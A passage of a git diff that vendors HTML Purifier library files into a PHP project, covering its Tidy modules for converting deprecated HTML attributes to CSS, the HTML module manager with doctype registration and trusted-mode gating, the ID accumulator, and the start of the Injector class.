$code->formatting = true; + + // Inline Structural ---------------------------------------------- + $this->addElement('span', 'Inline', 'Inline', 'Common'); + $this->addElement('br', 'Inline', 'Empty', 'Core'); + + // Block Phrasal -------------------------------------------------- + $this->addElement('address', 'Block', 'Inline', 'Common'); + $this->addElement('blockquote', 'Block', 'Optional: Heading | Block | List', 'Common', array('cite' => 'URI') ); + $pre = $this->addElement('pre', 'Block', 'Inline', 'Common'); + $pre->excludes = $this->makeLookup( + 'img', 'big', 'small', 'object', 'applet', 'font', 'basefont' ); + $this->addElement('h1', 'Heading', 'Inline', 'Common'); + $this->addElement('h2', 'Heading', 'Inline', 'Common'); + $this->addElement('h3', 'Heading', 'Inline', 'Common'); + $this->addElement('h4', 'Heading', 'Inline', 'Common'); + $this->addElement('h5', 'Heading', 'Inline', 'Common'); + $this->addElement('h6', 'Heading', 'Inline', 'Common'); + + // Block Structural ----------------------------------------------- + $p = $this->addElement('p', 'Block', 'Inline', 'Common'); + $p->autoclose = array_flip(array("address", "blockquote", "center", "dir", "div", "dl", "fieldset", "ol", "p", "ul")); + + $this->addElement('div', 'Block', 'Flow', 'Common'); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy.php new file mode 100644 index 000000000..21783f18e --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy.php @@ -0,0 +1,207 @@ +<?php + +/** + * Abstract class for a set of proprietary modules that clean up (tidy) + * poorly written HTML. + * @todo Figure out how to protect some of these methods/properties + */ +class HTMLPurifier_HTMLModule_Tidy extends HTMLPurifier_HTMLModule +{ + + /** + * List of supported levels. Index zero is a special case "no fixes" + * level. + */ + public $levels = array(0 => 'none', 'light', 'medium', 'heavy'); + + /** + * Default level to place all fixes in. Disabled by default + */ + public $defaultLevel = null; + + /** + * Lists of fixes used by getFixesForLevel(). Format is: + * HTMLModule_Tidy->fixesForLevel[$level] = array('fix-1', 'fix-2'); + */ + public $fixesForLevel = array( + 'light' => array(), + 'medium' => array(), + 'heavy' => array() + ); + + /** + * Lazy load constructs the module by determining the necessary + * fixes to create and then delegating to the populate() function. + * @todo Wildcard matching and error reporting when an added or + * subtracted fix has no effect. + */ + public function setup($config) { + + // create fixes, initialize fixesForLevel + $fixes = $this->makeFixes(); + $this->makeFixesForLevel($fixes); + + // figure out which fixes to use + $level = $config->get('HTML.TidyLevel'); + $fixes_lookup = $this->getFixesForLevel($level); + + // get custom fix declarations: these need namespace processing + $add_fixes = $config->get('HTML.TidyAdd'); + $remove_fixes = $config->get('HTML.TidyRemove'); + + foreach ($fixes as $name => $fix) { + // needs to be refactored a little to implement globbing + if ( + isset($remove_fixes[$name]) || + (!isset($add_fixes[$name]) && !isset($fixes_lookup[$name])) + ) { + unset($fixes[$name]); + } + } + + // populate this module with necessary fixes + $this->populate($fixes); + + } + + /** + * Retrieves all fixes per a level, returning fixes for that specific + * level as well as all levels below it. + * @param $level String level identifier, see $levels for valid values + * @return Lookup up table of fixes + */ + public function getFixesForLevel($level) { + if ($level == $this->levels[0]) { + return array(); + } + $activated_levels = array(); + for ($i = 1, $c = count($this->levels); $i < $c; $i++) { + $activated_levels[] = $this->levels[$i]; + if ($this->levels[$i] == $level) break; + } + if ($i == $c) { + trigger_error( + 'Tidy level ' . htmlspecialchars($level) . ' not recognized', + E_USER_WARNING + ); + return array(); + } + $ret = array(); + foreach ($activated_levels as $level) { + foreach ($this->fixesForLevel[$level] as $fix) { + $ret[$fix] = true; + } + } + return $ret; + } + + /** + * Dynamically populates the $fixesForLevel member variable using + * the fixes array. It may be custom overloaded, used in conjunction + * with $defaultLevel, or not used at all. + */ + public function makeFixesForLevel($fixes) { + if (!isset($this->defaultLevel)) return; + if (!isset($this->fixesForLevel[$this->defaultLevel])) { + trigger_error( + 'Default level ' . $this->defaultLevel . ' does not exist', + E_USER_ERROR + ); + return; + } + $this->fixesForLevel[$this->defaultLevel] = array_keys($fixes); + } + + /** + * Populates the module with transforms and other special-case code + * based on a list of fixes passed to it + * @param $lookup Lookup table of fixes to activate + */ + public function populate($fixes) { + foreach ($fixes as $name => $fix) { + // determine what the fix is for + list($type, $params) = $this->getFixType($name); + switch ($type) { + case 'attr_transform_pre': + case 'attr_transform_post': + $attr = $params['attr']; + if (isset($params['element'])) { + $element = $params['element']; + if (empty($this->info[$element])) { + $e = $this->addBlankElement($element); + } else { + $e = $this->info[$element]; + } + } else { + $type = "info_$type"; + $e = $this; + } + // PHP does some weird parsing when I do + // $e->$type[$attr], so I have to assign a ref. + $f =& $e->$type; + $f[$attr] = $fix; + break; + case 'tag_transform': + $this->info_tag_transform[$params['element']] = $fix; + break; + case 'child': + case 'content_model_type': + $element = $params['element']; + if (empty($this->info[$element])) { + $e = $this->addBlankElement($element); + } else { + $e = $this->info[$element]; + } + $e->$type = $fix; + break; + default: + trigger_error("Fix type $type not supported", E_USER_ERROR); + break; + } + } + } + + /** + * Parses a fix name and determines what kind of fix it is, as well + * as other information defined by the fix + * @param $name String name of fix + * @return array(string $fix_type, array $fix_parameters) + * @note $fix_parameters is type dependant, see populate() for usage + * of these parameters + */ + public function getFixType($name) { + // parse it + $property = $attr = null; + if (strpos($name, '#') !== false) list($name, $property) = explode('#', $name); + if (strpos($name, '@') !== false) list($name, $attr) = explode('@', $name); + + // figure out the parameters + $params = array(); + if ($name !== '') $params['element'] = $name; + if (!is_null($attr)) $params['attr'] = $attr; + + // special case: attribute transform + if (!is_null($attr)) { + if (is_null($property)) $property = 'pre'; + $type = 'attr_transform_' . $property; + return array($type, $params); + } + + // special case: tag transform + if (is_null($property)) { + return array('tag_transform', $params); + } + + return array($property, $params); + + } + + /** + * Defines all fixes the module will perform in a compact + * associative array of fix name to fix implementation. + */ + public function makeFixes() {} + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/Name.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/Name.php new file mode 100644 index 000000000..61ff85ce2 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/Name.php @@ -0,0 +1,24 @@ +<?php + +/** + * Name is deprecated, but allowed in strict doctypes, so onl + */ +class HTMLPurifier_HTMLModule_Tidy_Name extends HTMLPurifier_HTMLModule_Tidy +{ + public $name = 'Tidy_Name'; + public $defaultLevel = 'heavy'; + public function makeFixes() { + + $r = array(); + + // @name for img, a ----------------------------------------------- + // Technically, it's allowed even on strict, so we allow authors to use + // it. However, it's deprecated in future versions of XHTML. + $r['img@name'] = + $r['a@name'] = new HTMLPurifier_AttrTransform_Name(); + + return $r; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/Proprietary.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/Proprietary.php new file mode 100644 index 000000000..14c15c4a0 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/Proprietary.php @@ -0,0 +1,24 @@ +<?php + +class HTMLPurifier_HTMLModule_Tidy_Proprietary extends HTMLPurifier_HTMLModule_Tidy +{ + + public $name = 'Tidy_Proprietary'; + public $defaultLevel = 'light'; + + public function makeFixes() { + $r = array(); + $r['table@background'] = new HTMLPurifier_AttrTransform_Background(); + $r['td@background'] = new HTMLPurifier_AttrTransform_Background(); + $r['th@background'] = new HTMLPurifier_AttrTransform_Background(); + $r['tr@background'] = new HTMLPurifier_AttrTransform_Background(); + $r['thead@background'] = new HTMLPurifier_AttrTransform_Background(); + $r['tfoot@background'] = new HTMLPurifier_AttrTransform_Background(); + $r['tbody@background'] = new HTMLPurifier_AttrTransform_Background(); + $r['table@height'] = new HTMLPurifier_AttrTransform_Length('height'); + return $r; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/Strict.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/Strict.php new file mode 100644 index 000000000..c73dc3c4d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/Strict.php @@ -0,0 +1,21 @@ +<?php + +class HTMLPurifier_HTMLModule_Tidy_Strict extends HTMLPurifier_HTMLModule_Tidy_XHTMLAndHTML4 +{ + public $name = 'Tidy_Strict'; + public $defaultLevel = 'light'; + + public function makeFixes() { + $r = parent::makeFixes(); + $r['blockquote#content_model_type'] = 'strictblockquote'; + return $r; + } + + public $defines_child_def = true; + public function getChildDef($def) { + if ($def->content_model_type != 'strictblockquote') return parent::getChildDef($def); + return new HTMLPurifier_ChildDef_StrictBlockquote($def->content_model); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/Transitional.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/Transitional.php new file mode 100644 index 000000000..9960b1dd1 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/Transitional.php @@ -0,0 +1,9 @@ +<?php + +class HTMLPurifier_HTMLModule_Tidy_Transitional extends HTMLPurifier_HTMLModule_Tidy_XHTMLAndHTML4 +{ + public $name = 'Tidy_Transitional'; + public $defaultLevel = 'heavy'; +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/XHTML.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/XHTML.php new file mode 100644 index 000000000..db5a378e5 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/XHTML.php @@ -0,0 +1,17 @@ +<?php + +class HTMLPurifier_HTMLModule_Tidy_XHTML extends HTMLPurifier_HTMLModule_Tidy +{ + + public $name = 'Tidy_XHTML'; + public $defaultLevel = 'medium'; + + public function makeFixes() { + $r = array(); + $r['@lang'] = new HTMLPurifier_AttrTransform_Lang(); + return $r; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php new file mode 100644 index 000000000..02e943813 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php @@ -0,0 +1,161 @@ +<?php + +class HTMLPurifier_HTMLModule_Tidy_XHTMLAndHTML4 extends HTMLPurifier_HTMLModule_Tidy +{ + + public function makeFixes() { + + $r = array(); + + // == deprecated tag transforms =================================== + + $r['font'] = new HTMLPurifier_TagTransform_Font(); + $r['menu'] = new HTMLPurifier_TagTransform_Simple('ul'); + $r['dir'] = new HTMLPurifier_TagTransform_Simple('ul'); + $r['center'] = new HTMLPurifier_TagTransform_Simple('div', 'text-align:center;'); + $r['u'] = new HTMLPurifier_TagTransform_Simple('span', 'text-decoration:underline;'); + $r['s'] = new HTMLPurifier_TagTransform_Simple('span', 'text-decoration:line-through;'); + $r['strike'] = new HTMLPurifier_TagTransform_Simple('span', 'text-decoration:line-through;'); + + // == deprecated attribute transforms ============================= + + $r['caption@align'] = + new HTMLPurifier_AttrTransform_EnumToCSS('align', array( + // we're following IE's behavior, not Firefox's, due + // to the fact that no one supports caption-side:right, + // W3C included (with CSS 2.1). This is a slightly + // unreasonable attribute! + 'left' => 'text-align:left;', + 'right' => 'text-align:right;', + 'top' => 'caption-side:top;', + 'bottom' => 'caption-side:bottom;' // not supported by IE + )); + + // @align for img ------------------------------------------------- + $r['img@align'] = + new HTMLPurifier_AttrTransform_EnumToCSS('align', array( + 'left' => 'float:left;', + 'right' => 'float:right;', + 'top' => 'vertical-align:top;', + 'middle' => 'vertical-align:middle;', + 'bottom' => 'vertical-align:baseline;', + )); + + // @align for table ----------------------------------------------- + $r['table@align'] = + new HTMLPurifier_AttrTransform_EnumToCSS('align', array( + 'left' => 'float:left;', + 'center' => 'margin-left:auto;margin-right:auto;', + 'right' => 'float:right;' + )); + + // @align for hr ----------------------------------------------- + $r['hr@align'] = + new HTMLPurifier_AttrTransform_EnumToCSS('align', array( + // we use both text-align and margin because these work + // for different browsers (IE and Firefox, respectively) + // and the melange makes for a pretty cross-compatible + // solution + 'left' => 'margin-left:0;margin-right:auto;text-align:left;', + 'center' => 'margin-left:auto;margin-right:auto;text-align:center;', + 'right' => 'margin-left:auto;margin-right:0;text-align:right;' + )); + + // @align for h1, h2, h3, h4, h5, h6, p, div ---------------------- + // {{{ + $align_lookup = array(); + $align_values = array('left', 'right', 'center', 'justify'); + foreach ($align_values as $v) $align_lookup[$v] = "text-align:$v;"; + // }}} + $r['h1@align'] = + $r['h2@align'] = + $r['h3@align'] = + $r['h4@align'] = + $r['h5@align'] = + $r['h6@align'] = + $r['p@align'] = + $r['div@align'] = + new HTMLPurifier_AttrTransform_EnumToCSS('align', $align_lookup); + + // @bgcolor for table, tr, td, th --------------------------------- + $r['table@bgcolor'] = + $r['td@bgcolor'] = + $r['th@bgcolor'] = + new HTMLPurifier_AttrTransform_BgColor(); + + // @border for img ------------------------------------------------ + $r['img@border'] = new HTMLPurifier_AttrTransform_Border(); + + // @clear for br -------------------------------------------------- + $r['br@clear'] = + new HTMLPurifier_AttrTransform_EnumToCSS('clear', array( + 'left' => 'clear:left;', + 'right' => 'clear:right;', + 'all' => 'clear:both;', + 'none' => 'clear:none;', + )); + + // @height for td, th --------------------------------------------- + $r['td@height'] = + $r['th@height'] = + new HTMLPurifier_AttrTransform_Length('height'); + + // @hspace for img ------------------------------------------------ + $r['img@hspace'] = new HTMLPurifier_AttrTransform_ImgSpace('hspace'); + + // @noshade for hr ------------------------------------------------ + // this transformation is not precise but often good enough. + // different browsers use different styles to designate noshade + $r['hr@noshade'] = + new HTMLPurifier_AttrTransform_BoolToCSS( + 'noshade', + 'color:#808080;background-color:#808080;border:0;' + ); + + // @nowrap for td, th --------------------------------------------- + $r['td@nowrap'] = + $r['th@nowrap'] = + new HTMLPurifier_AttrTransform_BoolToCSS( + 'nowrap', + 'white-space:nowrap;' + ); + + // @size for hr -------------------------------------------------- + $r['hr@size'] = new HTMLPurifier_AttrTransform_Length('size', 'height'); + + // @type for li, ol, ul ------------------------------------------- + // {{{ + $ul_types = array( + 'disc' => 'list-style-type:disc;', + 'square' => 'list-style-type:square;', + 'circle' => 'list-style-type:circle;' + ); + $ol_types = array( + '1' => 'list-style-type:decimal;', + 'i' => 'list-style-type:lower-roman;', + 'I' => 'list-style-type:upper-roman;', + 'a' => 'list-style-type:lower-alpha;', + 'A' => 'list-style-type:upper-alpha;' + ); + $li_types = $ul_types + $ol_types; + // }}} + + $r['ul@type'] = new HTMLPurifier_AttrTransform_EnumToCSS('type', $ul_types); + $r['ol@type'] = new HTMLPurifier_AttrTransform_EnumToCSS('type', $ol_types, true); + $r['li@type'] = new HTMLPurifier_AttrTransform_EnumToCSS('type', $li_types, true); + + // @vspace for img ------------------------------------------------ + $r['img@vspace'] = new HTMLPurifier_AttrTransform_ImgSpace('vspace'); + + // @width for hr, td, th ------------------------------------------ + $r['td@width'] = + $r['th@width'] = + $r['hr@width'] = new HTMLPurifier_AttrTransform_Length('width'); + + return $r; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/XMLCommonAttributes.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/XMLCommonAttributes.php new file mode 100644 index 000000000..9c0e03198 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/XMLCommonAttributes.php @@ -0,0 +1,14 @@ +<?php + +class HTMLPurifier_HTMLModule_XMLCommonAttributes extends HTMLPurifier_HTMLModule +{ + public $name = 'XMLCommonAttributes'; + + public $attr_collections = array( + 'Lang' => array( + 'xml:lang' => 'LanguageCode', + ) + ); +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModuleManager.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModuleManager.php new file mode 100644 index 000000000..7a06fc022 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModuleManager.php @@ -0,0 +1,415 @@ +<?php + +class HTMLPurifier_HTMLModuleManager +{ + + /** + * Instance of HTMLPurifier_DoctypeRegistry + */ + public $doctypes; + + /** + * Instance of current doctype + */ + public $doctype; + + /** + * Instance of HTMLPurifier_AttrTypes + */ + public $attrTypes; + + /** + * Active instances of modules for the specified doctype are + * indexed, by name, in this array. + */ + public $modules = array(); + + /** + * Array of recognized HTMLPurifier_Module instances, indexed by + * module's class name. This array is usually lazy loaded, but a + * user can overload a module by pre-emptively registering it. + */ + public $registeredModules = array(); + + /** + * List of extra modules that were added by the user using addModule(). + * These get unconditionally merged into the current doctype, whatever + * it may be. + */ + public $userModules = array(); + + /** + * Associative array of element name to list of modules that have + * definitions for the element; this array is dynamically filled. + */ + public $elementLookup = array(); + + /** List of prefixes we should use for registering small names */ + public $prefixes = array('HTMLPurifier_HTMLModule_'); + + public $contentSets; /**< Instance of HTMLPurifier_ContentSets */ + public $attrCollections; /**< Instance of HTMLPurifier_AttrCollections */ + + /** If set to true, unsafe elements and attributes will be allowed */ + public $trusted = false; + + public function __construct() { + + // editable internal objects + $this->attrTypes = new HTMLPurifier_AttrTypes(); + $this->doctypes = new HTMLPurifier_DoctypeRegistry(); + + // setup basic modules + $common = array( + 'CommonAttributes', 'Text', 'Hypertext', 'List', + 'Presentation', 'Edit', 'Bdo', 'Tables', 'Image', + 'StyleAttribute', + // Unsafe: + 'Scripting', 'Object', 'Forms', + // Sorta legacy, but present in strict: + 'Name', + ); + $transitional = array('Legacy', 'Target', 'Iframe'); + $xml = array('XMLCommonAttributes'); + $non_xml = array('NonXMLCommonAttributes'); + + // setup basic doctypes + $this->doctypes->register( + 'HTML 4.01 Transitional', false, + array_merge($common, $transitional, $non_xml), + array('Tidy_Transitional', 'Tidy_Proprietary'), + array(), + '-//W3C//DTD HTML 4.01 Transitional//EN', + 'http://www.w3.org/TR/html4/loose.dtd' + ); + + $this->doctypes->register( + 'HTML 4.01 Strict', false, + array_merge($common, $non_xml), + array('Tidy_Strict', 'Tidy_Proprietary', 'Tidy_Name'), + array(), + '-//W3C//DTD HTML 4.01//EN', + 'http://www.w3.org/TR/html4/strict.dtd' + ); + + $this->doctypes->register( + 'XHTML 1.0 Transitional', true, + array_merge($common, $transitional, $xml, $non_xml), + array('Tidy_Transitional', 'Tidy_XHTML', 'Tidy_Proprietary', 'Tidy_Name'), + array(), + '-//W3C//DTD XHTML 1.0 Transitional//EN', + 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd' + ); + + $this->doctypes->register( + 'XHTML 1.0 Strict', true, + array_merge($common, $xml, $non_xml), + array('Tidy_Strict', 'Tidy_XHTML', 'Tidy_Strict', 'Tidy_Proprietary', 'Tidy_Name'), + array(), + '-//W3C//DTD XHTML 1.0 Strict//EN', + 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd' + ); + + $this->doctypes->register( + 'XHTML 1.1', true, + // Iframe is a real XHTML 1.1 module, despite being + // "transitional"! + array_merge($common, $xml, array('Ruby', 'Iframe')), + array('Tidy_Strict', 'Tidy_XHTML', 'Tidy_Proprietary', 'Tidy_Strict', 'Tidy_Name'), // Tidy_XHTML1_1 + array(), + '-//W3C//DTD XHTML 1.1//EN', + 'http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd' + ); + + } + + /** + * Registers a module to the recognized module list, useful for + * overloading pre-existing modules. + * @param $module Mixed: string module name, with or without + * HTMLPurifier_HTMLModule prefix, or instance of + * subclass of HTMLPurifier_HTMLModule. + * @param $overload Boolean whether or not to overload previous modules. + * If this is not set, and you do overload a module, + * HTML Purifier will complain with a warning. + * @note This function will not call autoload, you must instantiate + * (and thus invoke) autoload outside the method. + * @note If a string is passed as a module name, different variants + * will be tested in this order: + * - Check for HTMLPurifier_HTMLModule_$name + * - Check all prefixes with $name in order they were added + * - Check for literal object name + * - Throw fatal error + * If your object name collides with an internal class, specify + * your module manually. All modules must have been included + * externally: registerModule will not perform inclusions for you! + */ + public function registerModule($module, $overload = false) { + if (is_string($module)) { + // attempt to load the module + $original_module = $module; + $ok = false; + foreach ($this->prefixes as $prefix) { + $module = $prefix . $original_module; + if (class_exists($module)) { + $ok = true; + break; + } + } + if (!$ok) { + $module = $original_module; + if (!class_exists($module)) { + trigger_error($original_module . ' module does not exist', + E_USER_ERROR); + return; + } + } + $module = new $module(); + } + if (empty($module->name)) { + trigger_error('Module instance of ' . get_class($module) . ' must have name'); + return; + } + if (!$overload && isset($this->registeredModules[$module->name])) { + trigger_error('Overloading ' . $module->name . ' without explicit overload parameter', E_USER_WARNING); + } + $this->registeredModules[$module->name] = $module; + } + + /** + * Adds a module to the current doctype by first registering it, + * and then tacking it on to the active doctype + */ + public function addModule($module) { + $this->registerModule($module); + if (is_object($module)) $module = $module->name; + $this->userModules[] = $module; + } + + /** + * Adds a class prefix that registerModule() will use to resolve a + * string name to a concrete class + */ + public function addPrefix($prefix) { + $this->prefixes[] = $prefix; + } + + /** + * Performs processing on modules, after being called you may + * use getElement() and getElements() + * @param $config Instance of HTMLPurifier_Config + */ + public function setup($config) { + + $this->trusted = $config->get('HTML.Trusted'); + + // generate + $this->doctype = $this->doctypes->make($config); + $modules = $this->doctype->modules; + + // take out the default modules that aren't allowed + $lookup = $config->get('HTML.AllowedModules'); + $special_cases = $config->get('HTML.CoreModules'); + + if (is_array($lookup)) { + foreach ($modules as $k => $m) { + if (isset($special_cases[$m])) continue; + if (!isset($lookup[$m])) unset($modules[$k]); + } + } + + // custom modules + if ($config->get('HTML.Proprietary')) { + $modules[] = 'Proprietary'; + } + if ($config->get('HTML.SafeObject')) { + $modules[] = 'SafeObject'; + } + if ($config->get('HTML.SafeEmbed')) { + $modules[] = 'SafeEmbed'; + } + if ($config->get('HTML.Nofollow')) { + $modules[] = 'Nofollow'; + } + if ($config->get('HTML.TargetBlank')) { + $modules[] = 'TargetBlank'; + } + + // merge in custom modules + $modules = array_merge($modules, $this->userModules); + + foreach ($modules as $module) { + $this->processModule($module); + $this->modules[$module]->setup($config); + } + + foreach ($this->doctype->tidyModules as $module) { + $this->processModule($module); + $this->modules[$module]->setup($config); + } + + // prepare any injectors + foreach ($this->modules as $module) { + $n = array(); + foreach ($module->info_injector as $i => $injector) { + if (!is_object($injector)) { + $class = "HTMLPurifier_Injector_$injector"; + $injector = new $class; + } + $n[$injector->name] = $injector; + } + $module->info_injector = $n; + } + + // setup lookup table based on all valid modules + foreach ($this->modules as $module) { + foreach ($module->info as $name => $def) { + if (!isset($this->elementLookup[$name])) { + $this->elementLookup[$name] = array(); + } + $this->elementLookup[$name][] = $module->name; + } + } + + // note the different choice + $this->contentSets = new HTMLPurifier_ContentSets( + // content set assembly deals with all possible modules, + // not just ones deemed to be "safe" + $this->modules + ); + $this->attrCollections = new HTMLPurifier_AttrCollections( + $this->attrTypes, + // there is no way to directly disable a global attribute, + // but using AllowedAttributes or simply not including + // the module in your custom doctype should be sufficient + $this->modules + ); + } + + /** + * Takes a module and adds it to the active module collection, + * registering it if necessary. + */ + public function processModule($module) { + if (!isset($this->registeredModules[$module]) || is_object($module)) { + $this->registerModule($module); + } + $this->modules[$module] = $this->registeredModules[$module]; + } + + /** + * Retrieves merged element definitions. + * @return Array of HTMLPurifier_ElementDef + */ + public function getElements() { + + $elements = array(); + foreach ($this->modules as $module) { + if (!$this->trusted && !$module->safe) continue; + foreach ($module->info as $name => $v) { + if (isset($elements[$name])) continue; + $elements[$name] = $this->getElement($name); + } + } + + // remove dud elements, this happens when an element that + // appeared to be safe actually wasn't + foreach ($elements as $n => $v) { + if ($v === false) unset($elements[$n]); + } + + return $elements; + + } + + /** + * Retrieves a single merged element definition + * @param $name Name of element + * @param $trusted Boolean trusted overriding parameter: set to true + * if you want the full version of an element + * @return Merged HTMLPurifier_ElementDef + * @note You may notice that modules are getting iterated over twice (once + * in getElements() and once here). This + * is because + */ + public function getElement($name, $trusted = null) { + + if (!isset($this->elementLookup[$name])) { + return false; + } + + // setup global state variables + $def = false; + if ($trusted === null) $trusted = $this->trusted; + + // iterate through each module that has registered itself to this + // element + foreach($this->elementLookup[$name] as $module_name) { + + $module = $this->modules[$module_name]; + + // refuse to create/merge from a module that is deemed unsafe-- + // pretend the module doesn't exist--when trusted mode is not on. + if (!$trusted && !$module->safe) { + continue; + } + + // clone is used because, ideally speaking, the original + // definition should not be modified. Usually, this will + // make no difference, but for consistency's sake + $new_def = clone $module->info[$name]; + + if (!$def && $new_def->standalone) { + $def = $new_def; + } elseif ($def) { + // This will occur even if $new_def is standalone. In practice, + // this will usually result in a full replacement. + $def->mergeIn($new_def); + } else { + // :TODO: + // non-standalone definitions that don't have a standalone + // to merge into could be deferred to the end + // HOWEVER, it is perfectly valid for a non-standalone + // definition to lack a standalone definition, even + // after all processing: this allows us to safely + // specify extra attributes for elements that may not be + // enabled all in one place. In particular, this might + // be the case for trusted elements. WARNING: care must + // be taken that the /extra/ definitions are all safe. + continue; + } + + // attribute value expansions + $this->attrCollections->performInclusions($def->attr); + $this->attrCollections->expandIdentifiers($def->attr, $this->attrTypes); + + // descendants_are_inline, for ChildDef_Chameleon + if (is_string($def->content_model) && + strpos($def->content_model, 'Inline') !== false) { + if ($name != 'del' && $name != 'ins') { + // this is for you, ins/del + $def->descendants_are_inline = true; + } + } + + $this->contentSets->generateChildDef($def, $module); + } + + // This can occur if there is a blank definition, but no base to + // mix it in with + if (!$def) return false; + + // add information on required attributes + foreach ($def->attr as $attr_name => $attr_def) { + if ($attr_def->required) { + $def->required_attr[] = $attr_name; + } + } + + return $def; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/IDAccumulator.php b/lib/htmlpurifier/library/HTMLPurifier/IDAccumulator.php new file mode 100644 index 000000000..73215295a --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/IDAccumulator.php @@ -0,0 +1,53 @@ +<?php + +/** + * Component of HTMLPurifier_AttrContext that accumulates IDs to prevent dupes + * @note In Slashdot-speak, dupe means duplicate. + * @note The default constructor does not accept $config or $context objects: + * use must use the static build() factory method to perform initialization. + */ +class HTMLPurifier_IDAccumulator +{ + + /** + * Lookup table of IDs we've accumulated. + * @public + */ + public $ids = array(); + + /** + * Builds an IDAccumulator, also initializing the default blacklist + * @param $config Instance of HTMLPurifier_Config + * @param $context Instance of HTMLPurifier_Context + * @return Fully initialized HTMLPurifier_IDAccumulator + */ + public static function build($config, $context) { + $id_accumulator = new HTMLPurifier_IDAccumulator(); + $id_accumulator->load($config->get('Attr.IDBlacklist')); + return $id_accumulator; + } + + /** + * Add an ID to the lookup table. + * @param $id ID to be added. + * @return Bool status, true if success, false if there's a dupe + */ + public function add($id) { + if (isset($this->ids[$id])) return false; + return $this->ids[$id] = true; + } + + /** + * Load a list of IDs into the lookup table + * @param $array_of_ids Array of IDs to load + * @note This function doesn't care about duplicates + */ + public function load($array_of_ids) { + foreach ($array_of_ids as $id) { + $this->ids[$id] = true; + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Injector.php b/lib/htmlpurifier/library/HTMLPurifier/Injector.php new file mode 100644 index 000000000..5922f8130 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Injector.php @@ -0,0 +1,239 @@ +<?php + +/** + * Injects tokens into the document while parsing for well-formedness. + * This enables "formatter-like" functionality such as auto-paragraphing, + * smiley-ification and linkification to take place. + * + * A note on how handlers create changes; this is done by assigning a new + * value to the $token reference. These values can take a variety of forms and + * are best described HTMLPurifier_Strategy_MakeWellFormed->processToken() + * documentation. + * + * @todo Allow injectors to request a re-run on their output. This + * would help if an operation is recursive. + */ +abstract class HTMLPurifier_Injector +{ + + /** + * Advisory name of injector, this is for friendly error messages + */ + public $name; + + /** + * Instance of HTMLPurifier_HTMLDefinition + */ + protected $htmlDefinition; + + /** + * Reference to CurrentNesting variable in Context. This is an array + * list of tokens that we are currently "inside" + */ + protected $currentNesting; + + /** + * Reference to InputTokens variable in Context. This is an array + * list of the input tokens that are being processed. + */ + protected $inputTokens; + + /** + * Reference to InputIndex variable in Context. This is an integer + * array index for $this->inputTokens that indicates what token + * is currently being processed. + */ + protected $inputIndex; + + /** + * Array of elements and attributes this injector creates and therefore + * need to be allowed by the definition. Takes form of + * array('element' => array('attr', 'attr2'), 'element2') + */ + public $needed = array(); + + /** + * Index of inputTokens to rewind to. + */ + protected $rewind = false; + + /** + * Rewind to a spot to re-perform processing. This is useful if you + * deleted a node, and now need to see if this change affected any + * earlier nodes. Rewinding does not affect other injectors, and can + * result in infinite loops if not used carefully. + * @warning HTML Purifier will prevent you from fast-forwarding with this + * function. + */ + public function rewind($index) { + $this->rewind = $index; + } + + /** + * Retrieves rewind, and then unsets it. + */ + public function getRewind() { + $r = $this->rewind; + $this->rewind = false; + return $r; + } + + /** + * Prepares the injector by giving it the config and context objects: + * this allows references to important variables to be made within + * the injector. This function also checks if the HTML environment + * will work with the Injector (see checkNeeded()). + * @param $config Instance of HTMLPurifier_Config + * @param $context Instance of HTMLPurifier_Context + * @return Boolean false if success, string of missing needed element/attribute if failure + */ + public function prepare($config, $context) { + $this->htmlDefinition = $config->getHTMLDefinition(); + // Even though this might fail, some unit tests ignore this and + // still test checkNeeded, so be careful. Maybe get rid of that + // dependency. + $result = $this->checkNeeded($config); + if ($result !== false) return $result; + $this->currentNesting =& $context->get('CurrentNesting'); + $this->inputTokens 